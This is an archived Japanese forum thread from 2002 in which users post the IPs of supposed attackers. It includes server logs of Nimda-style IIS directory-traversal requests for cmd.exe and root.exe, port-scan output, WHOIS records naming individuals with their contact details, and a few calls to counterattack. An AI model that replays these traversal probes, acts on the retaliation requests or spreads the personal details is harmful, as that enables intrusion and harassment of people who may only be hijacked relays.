1 :
名無しさん@お腹いっぱい。 :
02/09/02 20:31 アタッカーのIPを晒してしまうスレ 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-" 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" ウザすぎ!!!
2 :
名無しさん@お腹いっぱい。 :02/09/02 20:33
( ´_ゝ`)フーン
こいつぁ、事件だぜ!
■■■■■■■■■■■■糸冬 了■■■■■■■■■■■■
5 :
名無しさん@お腹いっぱい。 :02/09/02 20:59
7 :
名無しさん@お腹いっぱい。 :02/09/02 21:12
61.205.103.31 - - [02/Sep/2002:20:52:46 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-" 61.205.103.31 - - [02/Sep/2002:20:52:47 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 61.205.103.31 - - [02/Sep/2002:20:52:47 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 61.205.103.31 - - [02/Sep/2002:20:52:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 61.205.103.31 - - [02/Sep/2002:20:52:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 61.205.103.31 - - [02/Sep/2002:20:52:51 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 61.205.103.31 - - [02/Sep/2002:20:52:51 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 61.205.103.31 - - [02/Sep/2002:20:52:52 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 61.205.103.31 - - [02/Sep/2002:20:52:52 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 61.205.103.31 - - [02/Sep/2002:20:52:54 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 61.205.103.31 - - [02/Sep/2002:20:52:54 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 61.205.103.31 - - [02/Sep/2002:20:52:56 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 61.205.103.31 - - [02/Sep/2002:20:52:56 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
>>1 それを晒してなんの意味があるわけ?
しかもわざわざスレまで立てて。
自己満足?
そういうのは脳内だけでやってね
このIPアドレスやばくない?晒していいのかな
11 :
名無しさん@お腹いっぱい。 :02/09/03 01:49
アタッカー 晒しあげ
nimdaじゃん
削除依頼済
14 :
名無しさん@お腹いっぱい。 :02/09/04 10:22
どこから繋げているかを どこで調べるの? 218.216.226.25
NTT
16 :
名無しさん@お腹いっぱい。 :02/09/04 10:27
中部ケーブルネットワーク株式会社
みんなありがとう。 POP3に見知らぬIPがあったので調べてみると 元カノでした(怖
あたっく〜 あたっく〜 終わり
21 :
名無しさん@お腹いっぱい。 :02/09/08 00:37
IP Address List HostName Aliases 218. 43. 59. 19 p7019-adsao02yokoni-acca.kanagawa.ocn.ne.jp はいよ
22 :
名無しさん@お腹いっぱい。 :02/09/08 00:50
アタックだと勘違いして妄想を書き込むスレはここですか?
IP: 210.197.82.66 DNS: c82066.tctv.ne.jp IP: 210.197.82.133 DNS: c82133.tctv.ne.jp
n08-170.ip-tokyo.highway.ne.jp 誰?
26 :
名無しさん@お腹いっぱい。 :02/09/23 00:52
203.141.136.3 晒しage
寝言は寝てから言うもんだがな???
28 :
名無しさん@お腹いっぱい。 :02/09/23 11:09
219.48.212.30に注意!!とろいの木馬さんを送ってきます
早とちりはイカン
31 :
名無しさん@お腹いっぱい。 :02/09/23 12:32
192.168.0.1
32 :
名無しさん@お腹いっぱい。 :02/09/23 12:52
おまいら どんなアタックなのかも書き込め。
34 :
名無しさん@お腹いっぱい。 :02/09/25 15:12
Personal Information: [個人情報]
a. [JPNICハンドル] YK7789JP
b. [氏名] 木村 保博
c. [Last, First] Kimura, Yasuhiro
d. [電子メイル]
[email protected] f. [組織名] ファストネット株式会社
g. [Organization] FastNet,Inc.
k. [部署] インターネット事業部 インターネット技術推進部
l. [Division] Internet Technology Promotion Div. Internet Business Group
m. [肩書]
n. [Title]
o. [電話番号] XXXXXXXXXX
p. [FAX番号] XXXXXXXXXX
y. [通知アドレス]
[email protected] [最終更新] 2001/09/14 16:04:53 (JST)
[email protected] コイツちょこちょこハッキングしてくる。ウザイ。晒す。
35 :
名無しさん@お腹いっぱい。 :02/09/25 22:06
>>1 の鯖ってさ、クレズとか受け入れちゃったんだね(稿)
管理責任能力が欠如してるんだろう(劇稿)
Apacheのログなんか見せて喜んでるアフォは沈んどけ(晒し上げ)
あげ荒らしが頻発の為、運営側と相談中。 ■■■■■■■■終了■■■■■■■■
210.197.83.196, c83196.tctv.ne.jp
38 :
名無しさん@お腹いっぱい。 :02/09/26 21:32
\\219.25.26.18\SharedDocs\
39 :
名無しさん@お腹いっぱい。 :02/09/29 20:42
踏み台にされてる香具師だっているんだぞ! 晒すな!! キチガイども!
40 :
名無しさん@お腹いっぱい。 :02/09/29 20:59
>>1 こういう情報は公開されてます
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.205.113.0-61.205.119.0
b. [ネットワーク名] K-OPTICOM
f. [組織名] 株式会社ケイ・オプティコム
g. [Organization] K-Opticom Corporation
m. [運用責任者] KH4246JP
n. [技術連絡担当者] YI4008JP
p. [ネームサーバ] ns1.eonet.ne.jp
p. [ネームサーバ] ns2.eonet.ne.jp
y. [通知アドレス]
[email protected] [割当年月日] 2001/09/26
[最終更新] 2002/02/01 10:07:57 (JST)
[email protected]
41 :
名無しさん@お腹いっぱい。 :02/09/29 23:47
217.98.209.11 これは串ですかね?
日付: 2002/09/30 時刻: 21:40:51 アドレス 218.120.90.35 からの不正侵入の試みを規則 Portal of Doom トロイの木馬のデフォルト遮断 によって検出しました。 以降のアクセスを 30 分間遮断しました。
ここ20日ほどうざいので晒しあげ。 Security Violations =-=-=-=-=-=-=-=-=-= Sep 30 17:43:04 myhost in.ftpd[11280]: refused connect from 210.3.205.65 Sep 30 17:46:16 myhost in.ftpd[11286]: refused connect from 210.3.205.65 Sep 30 17:47:37 myhost in.ftpd[11292]: refused connect from 210.3.205.65 Sep 30 17:48:06 myhost in.ftpd[11298]: refused connect from 210.3.205.65 Sep 30 17:48:28 myhost in.ftpd[11304]: refused connect from 210.3.205.65 Sep 30 17:48:49 myhost in.ftpd[11310]: refused connect from 210.3.205.65 Sep 30 17:49:08 myhost in.ftpd[11316]: refused connect from 210.3.205.65 Sep 30 17:49:33 myhost in.ftpd[11322]: refused connect from 210.3.205.65 Sep 30 17:50:22 myhost in.ftpd[11330]: refused connect from 210.3.205.65 Sep 30 17:51:15 myhost in.ftpd[11336]: refused connect from 210.3.205.65 Sep 30 17:51:45 myhost in.ftpd[11342]: refused connect from 210.3.205.65 Sep 30 17:52:17 myhost in.ftpd[11348]: refused connect from 210.3.205.65 Sep 30 17:52:47 myhost in.ftpd[11354]: refused connect from 210.3.205.65 途中略 Sep 30 17:55:32 myhost in.ftpd[11384]: refused connect from 210.3.205.65 Sep 30 17:55:58 myhost in.ftpd[11390]: refused connect from 210.3.205.65 Sep 30 17:56:26 myhost in.ftpd[11396]: refused connect from 210.3.205.65 Sep 30 17:56:56 myhost in.ftpd[11402]: refused connect from 210.3.205.65 Sep 30 17:58:20 myhost in.ftpd[11408]: refused connect from 210.3.205.65 Sep 30 17:58:46 myhost in.ftpd[11414]: refused connect from 210.3.205.65 Sep 30 17:59:22 myhost in.ftpd[11420]: refused connect from 210.3.205.65 Sep 30 17:59:54 myhost in.ftpd[11426]: refused connect from 210.3.205.65 Sep 30 18:00:22 myhost in.ftpd[11434]: refused connect from 210.3.205.65 Sep 30 18:00:50 myhost in.ftpd[11440]: refused connect from 210.3.205.65
今調べたら、ここ踏み台にされてるな。 いつまでもほっとくなよ、管理者。 ftpd,rpc,apache,mod_ssl,php,openssh,cgi どれもだめじゃん。
45 :
名無しさん@お腹いっぱい。 :02/10/11 21:12
146.245.2.221
46 :
名無しさん@お腹いっぱい。 :02/10/14 00:28
210.156.65.118
47 :
名無しさん@お腹いっぱい。 :02/10/14 01:05
127.0.0.2
49 :
名無しさん@お腹いっぱい。 :02/10/14 01:48
192.168.0.1
50 :
名無しさん@お腹いっぱい。 :02/10/14 02:12
0120.333.333
51 :
名無しさん@お腹いっぱい。 :02/10/14 02:17
24.194.183.92 臭ってくんだよ・・ こいつのおかげで部屋がくさい
52 :
名無しさん@お腹いっぱい。 :02/10/14 14:43
あたっく〜 あたっく〜 はっか〜 こわい〜 IPを〜 さらすぜ〜 IPが〜 わかれば〜 なんでも〜 出来ちゃうんだぞ〜 トロイの木馬を〜 送るんだ〜
55 :
名無しさん@お腹いっぱい。 :02/10/14 21:29
152.163.213.238 64.12.128.18 64.12.128.14 205.188.193.229 152.163.207.230 205.188.193.91 205.188.197.106
56 :
名無しさん@お腹いっぱい。 :02/10/14 21:33
205.188.198.105 64.12.101.232 64.12.107.104 210.57.155.34 205.188.193.110 207.188.7.80
57 :
名無しさん@お腹いっぱい。 :02/10/14 21:36
169.254.159.252 131.234.25.25 202.1.237.109 218.1.64.59 202.103.30.73 61.145.116.138 61.135.129.65 152.163.213.220 130.94.92.107 152.63.53.250
58 :
名無しさん@お腹いっぱい。 :02/10/14 21:39
202.188.53.25 205.188.193.92 152.163.213.231 152.63.53.250 152.63.50.193 152.63.55.114 172.16.20.6
59 :
名無しさん@お腹いっぱい。 :02/10/15 01:55
台湾とかブラジルとかイタリアとかシンガポールとか イスラエルとかアメリカとかフランスとかから来るのは ワールドカップ関連のサイトをサーフィンしたせいかなぁ。 それとマカーにexeとか送るのやめてね?・ウザイから。
60 :
名無しさん@お腹いっぱい。 :02/10/15 02:27
姉さん事件です!
61 :
名無しさん@お腹いっぱい。 :02/10/15 03:03
211.133.144.18 TCP act packet attack これは串ですか?
62 :
名無しさん@お腹いっぱい。 :02/10/15 03:07
63 :
名無しさん@お腹いっぱい。 :02/10/15 04:30
>>62 IPを調べてみたら
株式会社ジンオフィスサービス という会社から
アタックされてることが判明しました。
さらに
61.121.253.63
バリュークリックジャパンというところからも
TCP ack packet attackという攻撃をされた事
がログに残ってました。
企業が個人に攻撃するなんて事はあるんですかね?
64 :
名無しさん@お腹いっぱい。 :02/10/15 04:35
なあ、 な ん で 「 攻 撃 」 な ん だ ?
66 :
名無しさん@お腹いっぱい。 :02/10/15 06:25
ハイジャックと来ましたか 最近のPFWは語彙が豊かでイイね その分実際に何が行われたかがきちんと伝えられず、不安を煽られる厨房が多いけど
192.168.0.1
69 :
名無しさん@お腹いっぱい。 :02/10/15 08:41
clock.nc.fukuoka-u.ac.jp (133.100.9.2):ntp123 さっき福岡大学からトロイの侵入があった・・・。
>>69 たぶん時計の時刻がハッキングされてるぞ!
72 :
名無しさん@お腹いっぱい。 :02/10/15 11:47
経営しているHPに、WEBAUTOというソフトをつかって、ずーっと
アタックして、カウンターCGIに負荷かけていあるアフォが
きました。↓生IPでやっている。
218.218.156.254
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.218.0.0-218.218.255.0
b. [ネットワーク名] ODN
f. [組織名] オープンデータネットワーク(日本テレコム株式会社)
g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
m. [運用責任者] YN234JP
n. [技術連絡担当者] YN234JP
p. [ネームサーバ] ns1.dhs.jtidc.jp/218.218.247.0
p. [ネームサーバ] ns1.v6.odn.ne.jp/218.218.252.0
p. [ネームサーバ] ns2.dhs.jtidc.jp/218.218.247.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.0.0-218.218.246.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.248.0-218.218.251.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.253.0-218.218.255.0
p. [ネームサーバ] ns2.v6.odn.ne.jp/218.218.252.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.0.0-218.218.246.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.248.0-218.218.251.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.253.0-218.218.255.0
y. [通知アドレス]
[email protected] [割当年月日] 2002/01/22
[最終更新] 2002/08/08 14:50:12 (JST)
[email protected]
73 :
名無しさん@お腹いっぱい。 :02/10/15 12:18
昨日晩より頻繁にアタックされるようになりました。 218.232.110.135 210.136.232.249 194.135.19.40 81.23.228.65. 61.121.253.68 今まで一度も無かったのになんだか怖いです・・・ ルーターかましてても駄目なんですかね?
いまだにwhois貼り付けてるバカいるんだな
75 :
名無しさん@お腹いっぱい。 :02/10/16 23:11
yahoobb219185148055.bbtec.net ppp0113.hakata01.bbiq.jp こいつらうぜえ・・・ 特にAhooの香具師。 2時間に200回以上検出されてる。
61.126.200.32 61.25.50.149 いやー、ログみたらお腹いっぱい。 netbus netspy girlfrend、、、 なつかしいトロイの祭り。w
216.87.73.170
あぼーん
80 :
名無しさん@お腹いっぱい。 :02/10/18 22:08
218-163-174-144.HINET-IP.hinet.net
210.230.244.22 telnet 23 ・・・・・・って、おぃおぃ、IP打ち間違えたか?
>>82 の書き込みの者です。
先程は
>>1 への感情が先走って、お願い事をしてしまいました。
掲示板の方は荒らしている方を非難するつもりはなく前向きにいこうと言うことでした。
ご迷惑をおかけして申し訳ありませんでした。
ただ、私個人としては、復讐などするつもりはありません。 ”誰がやったのか”が知りたいだけなのです。
>>◆BonkFKHXWw BBSの方を拝見させて頂きましたが、管理者権限で投稿者のIP、ホストを表示出来るタイプのBBSの様ですので。 ご遺族の方々と協力さえすれば、荒しをした方の(その当時の)IPは判明するかと思われます。 しかし、IPが判ったからといって、その個人を特定出来るとは限りませんので、その辺りをご理解頂けます様、お願い致します。 また、このスレはアタッカー(クラックor特定の攻撃意図を持った者)のIPを晒すスレですので、今後は別スレでお願いします。
86 :
こいつ しつこい :02/10/19 22:38
>>85 さん、
ありがとうございました。
ただ、ダウソ板初めてのものなので、
>後は別スレで
といわれてもどこにいけばいいかわかりましぇん(泣)
ご迷惑ついでに、誘導おながいします。
88 :
名無しさん@お腹いっぱい。 :02/10/20 00:40
80.11.164.118
YahooBB219185016097.bbtec.net xdsl027171.061200.metallic.ne.jp
90 :
名無しさん@お腹いっぱい。 :02/10/20 12:52
147.208.171.140 こいつから、150以上のアタックをされています。こいつは、創価学会員です。あいつらは、本当にやり口が汚いよ。
あなたが検索されたIPアドレス[ 147.208.171.140 ]の企業名・団体名は以下の通りです。 Intel Corporation INTEL-FSO (NET-147-208-0-0-1) 147.208.0.0 - 147.208.255.255 Symantec Corporation SYMANTEC-INTELONLINE (NET-147-208-171-128-1) 147.208.171.128 - 147.208.171.191
92 :
名無しさん@お腹いっぱい。 :02/10/20 15:31
Domain servers in listed order: DNS03.BBTEC.NET 43.224.255.3 DNS04.BBTEC.NET 43.224.255.4 DNS06.BBTEC.NET 43.231.251.96
93 :
名無しさん@お腹いっぱい。 :02/10/20 16:05
うざい!
OrgName: ChungNam National University
OrgID: CNU
NetRange: 168.188.0.0 - 168.188.255.255
CIDR: 168.188.0.0/16
NetName: CHUNGNAM
NetHandle: NET-168-188-0-0-1
Parent: NET-168-0-0-0-0
NetType: Direct Assignment
NameServer: BAEKMA.CHUNGNAM.AC.KR
NameServer: NS.KREN.NM.KR
Comment:
RegDate: 1994-06-07
Updated: 1996-05-03
TechHandle: HK283-ARIN
TechName: Kisun, Han
TechPhone: +82-42-821-6055
TechEmail:
[email protected]
95 :
名無しさん@お腹いっぱい。 :02/10/20 16:10
(´-`).。oO(まだWhois貼り付けて喜ぶヤシいるんだ…)
(´-`).。oO(大体踏み台かもしれないのに・・・・・)
サーバのport23(telnet)にずーっと攻撃かけてくるこのヴァカは誰だ? 12.249.18.25[12-249-18-25.client.attbi.com] …っておい、AT&Tかよ (@_@)?!!
99 :
名無しさん@お腹いっぱい。 :02/10/21 02:31
YahooBB218141016006.bbtec.net 多分踏み台なんだろうけどなぁ・・・
100
頻繁にノートンが警告してきます。 なんなのでしょうか? 202.248.20.208
来る日も来る日もNetBIOS〜〜 IP晒すにしても多すぎて無理〜〜♪
dns30.bbtec.net(218.176.253.82) ページ移動するたびに出てくるんで気持ち悪いです。
104 :
名無しさん@お腹いっぱい。 :02/10/22 02:02
200.64.172.123 212.30.93.79 18.11.95.172 213.169.247.76 64.125.31.82.
106 :
名無しさん@お腹いっぱい。 :02/10/22 12:31
Whoisってなんですか?
>>106 駄目な例
・検索という言葉を知らない。
108 :
これなんですか?どこですか? :02/10/22 14:17
リモートアドレス:KFZFXOAKWEL3QDZ(192.168.0.3):3987 ローカルアドレス:KFZFXOAKWEL3QDZ(192.168.0.3):ssdp
今日の ウイルスバスター2002 ログ リスト 種類,時刻,受信/送信,プロトコル,送信元IPアドレス,送信元ポート,送信先IPアドレス,送信先ポート,説明 ファイアウォール,14:49:50,受信,ICMP,211.14.14.126,N/A,192.168.0.2,N/A,Smurf, ファイアウォール,14:49:55,受信,ICMP,210.153.89.246,N/A,192.168.0.2,N/A,Smurf, ファイアウォール,14:49:58,受信,ICMP,211.14.12.11,N/A,192.168.0.2,N/A,Smurf, 10/19日の ウイルスバスター2002 ログ リスト 種類,時刻,受信/送信,プロトコル,送信元IPアドレス,送信元ポート,送信先IPアドレス,送信先ポート,説明 クローキング,01:14:39,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:49,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:49,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, クローキング,01:14:55,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking, (以下略 これ何?
うおおーーーっ!! ファイヤーウォールのパワーを全開だ!! 俺のPCを不正アクセスから守ってくれっ!!!
112 :
極悪不正アクセス野郎 :02/10/22 23:03
ローカルアドレス、 サービスは 211.132.156.217,nbsession(139)
誰か攻撃してやって下さい
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail:
[email protected] admin-c: SN108-AP
tech-c: KS218-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed:
[email protected] 19990629
changed:
[email protected] 20011011
changed:
[email protected] 20021018
source: APNIC
inetnum: 211.132.128.0 - 211.132.159.255
netname: XEPHION
descr: XePhion(NTT-ME Corporation)
country: JP
んだから、Whois貼るアホは帰れと、(以下略)
なんつーか、 IPアドレスから(中略)できるよーな人たちには冗長な情報なんじゃなかろーか、 とか思ったりは…しないんだろうな。 たぶん 「自分だけがこの方法を知っている!」 「IPだけじゃなく個人情報も2chに晒してる!」 と思ってたりするんだろう。
115 :
名無しさん@お腹いっぱい。 :02/10/23 05:14
24.167.17.57
116 :
名無しさん@お腹いっぱい。 :02/10/23 07:05
195.7.124.3 Ping Attackウザイ
118 :
名無しさん@お腹いっぱい。 :02/10/23 20:19
211.114.52.123,3799 侵入野郎
person: Heesung Yang
descr: Pongsu Primary School
descr: 284-438 KAJEONG2DONG SEOKU
descr: INCHON
descr: 404-232
country: KR
phone: +82-32-567-0282
fax-no: +82-32-567-0284
e-mail:
[email protected] nic-hdl: HY536-KR
>>118 >>113 が難(むず)しくて読(よ)めないのか?
んだから、Whois(ふーいず)貼(は)るアホ(あほ)は帰(かえ)れと、(以下略(いかりゃく))
120 :
鬼畜米英此レ皆死スヘシ :02/10/26 11:30
webmail.sonepar-us.com
121 :
名無しさん@お腹いっぱい。 :02/10/26 12:01
210.136.232.250 ad.jp.ap.valuecommerce.com ウザ過ぎ、このインチキ会社やってくれ。
>>122 そんなとこ許可しているお前がアホ。
この板的にはFWでin,out共にブロック。
>>122 アタッカーの意味を分かって言ってるのかと(以下略
125 :
名無しさん@お腹いっぱい。 :02/10/26 18:21
126 :
名無しさん@お腹いっぱい。 :02/10/26 20:48
こいつを逆にアタクしてやりたい。
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.207.0.0-61.207.255.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp/61.207.56.0-61.207.255.0
p. [ネームサーバ] ns-kn001.ocn.ad.jp/61.207.56.0-61.207.255.0
p. [ネームサーバ] ns-os001.ocn.ad.jp/61.207.0.0-61.207.37.0
p. [ネームサーバ] ns-os001.ocn.ad.jp/61.207.42.0-61.207.55.0
p. [ネームサーバ] ns-tkb01.ocn.ad.jp/61.207.38.0-61.207.41.0
p. [ネームサーバ] ns-tkb02.ocn.ad.jp/61.207.38.0-61.207.41.0
p. [ネームサーバ] pns.ocn.ad.jp/61.207.0.0-61.207.37.0
p. [ネームサーバ] pns.ocn.ad.jp/61.207.42.0-61.207.55.0
y. [通知アドレス]
[email protected] [割当年月日] 2001/05/08
[最終更新] 2002/01/28 10:53:02 (JST)
[email protected]
>>126 一つ聞きますけど、
それの意味分かってます?
>>127 絨毯爆撃でもする気なんでは。いやー勇者だねー。
129 :
名無しさん@お腹いっぱい。 :02/10/26 22:48
218.158.93.101 から攻撃を受けますタ。韓国であるます。
あっそ
>>130 いえ、阿蘇ではございません。韓国であるます。
くっそ
フッ素
157.206.3.109通信の要求2002/10/27 9:09:18TCP(4054) 65.213.187.99通信の要求2002/10/27 9:07:03TCP(4049) 216.32.210.138通信の要求2002/10/27 9:01:10TCP(4088) 217.8.96.171通信の要求2002/10/27 8:59:59TCP(4069) 61.156.45.47通信の要求2002/10/27 8:57:35TCP(4090) 66.40.9.137通信の要求2002/10/27 8:57:03TCP(4084) 66.230.128.22通信の要求2002/10/27 8:56:57TCP(4081) 64.186.142.55通信の要求2002/10/27 8:56:46TCP(4029) ついさっきからこいつらに激しく通信の要求されまくってる。 いやいやこまったね。
135 :
名無しさん@お腹いっぱい。 :02/10/27 20:10
時間, イベント, 侵入者, カウント 2002/10/27 20:03:03, SubSeven port probe, 250.a.005.mel.iprimus.net.au, 3 2002/10/27 19:32:02, SubSeven port probe, sxpp-p-144-139-125-33.prem.tmns.net.au, 3 2002/10/27 19:19:05, SubSeven port probe, c17098.dandn1.vic.optusnet.com.au, 3 2002/10/27 18:55:33, Telnet port probe, 211.93.133.66, 2 2002/10/27 18:13:22, SubSeven port probe, d161-ps3-mel.alphalink.com.au, 3 2002/10/27 17:23:31, MSRPC UDP port probe, Toronto-ppp274573.sympatico.ca, 1 2002/10/27 17:13:19, SMTP port probe, 211.230.36.131, 3 2002/10/27 16:45:57, SQL port probe, adsl-64-175-194-18.dsl.lsan03.pacbell.net, 3 2002/10/27 16:21:40, FTP port probe, 211.105.32.230, 1 2002/10/27 15:02:17, SubSeven port probe, c17000.brodm1.vic.optusnet.com.au, 3 2002/10/27 13:49:33, Telnet port probe, 211.93.133.66, 2 2002/10/27 12:34:03, RPC TCP port probe, 0x50c63795.kd4nxx10.adsl-dhcp.tele.dk, 4 2002/10/27 09:21:09, TCP port probe, 202.108.254.200, 1
136 :
0 ◆vvNw40nbIc :02/10/27 20:11
2002/10/27 09:21:09, Proxy port probe, 202.108.254.200, 2 2002/10/27 09:21:09, SOCKS port probe, 202.108.254.200, 1 2002/10/27 09:21:08, HTTP port probe, 202.108.254.200, 1 2002/10/27 08:48:28, FTP port probe, kiss.pl.gin.cz, 4 2002/10/27 08:32:22, FTP port probe, 210.51.248.127, 3 2002/10/27 08:13:39, FTP port probe, 61.183.172.138, 2 2002/10/27 05:00:52, FTP port probe, 62.211.49.88, 1 2002/10/27 03:16:37, SQL port probe, 195.141.157.37, 3 2002/10/27 02:21:50, FTP port probe, 210.12.186.178, 4 2002/10/27 01:17:48, HTTP port probe, 200-23-182-181.frellinux.frel.com.mx, 2 2002/10/26 23:15:48, HTTP port probe, innogate.rallis.co.in, 1 2002/10/26 22:01:15, SMTP port probe, 211.230.36.131, 3 2002/10/26 22:00:42, TCP port probe, 202.108.254.200, 1 2002/10/26 22:00:40, Proxy port probe, 202.108.254.200, 2 2002/10/26 22:00:38, SOCKS port probe, 202.108.254.200, 1
137 :
0 ◆vvNw40nbIc :02/10/27 20:11
2002/10/26 22:00:35, HTTP port probe, 202.108.254.200, 1 2002/10/26 17:43:26, SQL port probe, 210006066206.ctinets.com, 3 2002/10/26 16:03:46, SQL port probe, host-216-153-146-142.spr.choiceone.net, 3 2002/10/26 15:07:31, FTP port probe, 213.236.234.140, 2 2002/10/26 14:35:04, MSRPC TCP port probe, w115.z066089005.chi-il.dsl.cnc.net, 3 2002/10/26 14:06:02, SQL port probe, sql.partypop.com, 2 2002/10/26 11:43:17, SOCKS port probe, 80.48.245.161, 1 2002/10/26 11:38:06, HTTP port probe, 210.12.214.82, 1
だから踏み台吊るして何があるのかと(以下略
>>138 踏み台として利用できることがひとめでわかって便利。
踏み台にしてこい
ちょっと待った。そもそもそういう目的のスレなんじゃないの?
ファイアウォールは 61.213.194.75 (TCP Port 1618) [TCP Flags: S]. から、 このコンピュータ (TCP Port 7743) への インターネット アクセスをブロックしました。 61.213.194.75よ、Port総当りはやめてくれ・・・ ZoneAlarmのlogにお前のIDがいっぱいだ・・・ 今はwinny起動してないぞ。
tp241122.seeder.net
147 :
名無しさん@お腹いっぱい。 :02/11/01 22:16
あぼーん
149 :
名無しさん@お腹いっぱい。 :02/11/02 01:18
219.160.108. 46 p7046-ipad01koufu.yamanashi.ocn.ne.jp
150 :
名無しさん@お腹いっぱい。 :02/11/02 01:58
219.160.108. 46 p7046-ipad01koufu.yamanashi.ocn.ne.jp Port ServiceName Description State 80 www-http World Wide Web HTTP TCP 接続可 81 hosts2-ns HOSTS2 Name Server TCP 接続可 82 xfer XFER Utility TCP 接続可 83 mit-ml-dev MIT ML Device TCP 接続可 110 pop3 Post Office Protocol - Version 3 TCP 接続可 119 nntp Network News Transfer Protocol TCP 接続可 test
cs81219.pp.htv.fi
Name: cs81219.pp.htv.fi Address: 212.90.81.219 ちなみにコレ(nslookup cs81219.pp.htv.fi)は正引き
218.158.93.105
155 :
名無しさん@お腹いっぱい。 :02/11/03 02:54
218.47.201.181 (i201181.ap.plala.or.jp)
これなんとかしてくれ!。侵入野郎・・・・。
Domain Information:
a. [Domain Name] CC22.NE.JP
d. [Network Service Name] Cable City22 Internet
l. [Organization Type] Network Service
m. [Administrative Contact] SF109JP
n. [Technical Contact] SS372JP
p. [Name Server] ns.cc22.ne.jp
p. [Name Server] ns.enjoy.ad.jp
